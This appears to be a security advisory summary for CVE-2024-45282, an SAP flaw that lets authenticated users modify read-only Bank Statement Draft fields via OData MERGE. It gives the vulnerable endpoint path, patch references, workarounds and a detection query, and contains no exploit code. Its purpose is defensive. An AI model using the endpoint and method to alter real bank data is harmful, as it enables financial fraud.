CVE-2024-45282
📋 TL;DR
This vulnerability allows attackers to modify read-only fields in Bank Statement Drafts within SAP's Manage Bank Statements application using the OData MERGE method. This affects SAP systems with the vulnerable component where users can access the OData service. The integrity of financial data could be compromised.
💻 Affected Systems
- SAP S/4HANA
- SAP ERP
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Malicious actors could alter bank statement data, leading to financial discrepancies, incorrect reconciliations, or fraudulent transactions being processed.
Likely Case
Unauthorized modification of bank statement fields could cause data integrity issues requiring manual correction and investigation.
If Mitigated
With proper access controls and monitoring, impact would be limited to minor data inconsistencies that can be detected and corrected.
🎯 Exploit Status
Requires authenticated access to the OData service endpoint
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: See SAP Note 3251893 for specific patch versions
Vendor Advisory: https://me.sap.com/notes/3251893
Restart Required: Yes
Instructions:
1. Review SAP Note 3251893. 2. Apply the relevant SAP Security Patch Day updates. 3. Restart affected SAP systems. 4. Verify the fix by testing read-only field behavior.
🔧 Temporary Workarounds
Restrict OData Service Access
allLimit access to the vulnerable OData service endpoint to authorized users only
Configure SAP authorization roles to restrict access to /sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV
Implement Input Validation
allAdd custom validation to reject MERGE requests attempting to modify read-only fields
Implement BAdI or enhancement to validate field modifications before processing
🧯 If You Can't Patch
- Implement strict access controls to limit who can access the Manage Bank Statements application
- Enable detailed auditing and monitoring of all OData MERGE operations on bank statement drafts
🔍 How to Verify
Check if Vulnerable:
Test if read-only fields in Bank Statement Draft can be modified via OData MERGE requests to the vulnerable endpointCheck Version:
Check SAP system version and applied patches via transaction SPAM or SNOTEVerify Fix Applied:
After patching, verify that read-only fields reject modification attempts via OData MERGE method📡 Detection & Monitoring
Log Indicators:
- Unusual OData MERGE requests to bank statement endpoints
- Multiple failed modification attempts on read-only fields
Network Indicators:
- HTTP PATCH/MERGE requests to /sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV with field modification attempts
SIEM Query:
source="sap_audit_log" AND (event="ODATA_MODIFY" OR event="FIELD_MODIFICATION") AND resource="BANK_STATEMENT_DRAFT" AND status="SUCCESS"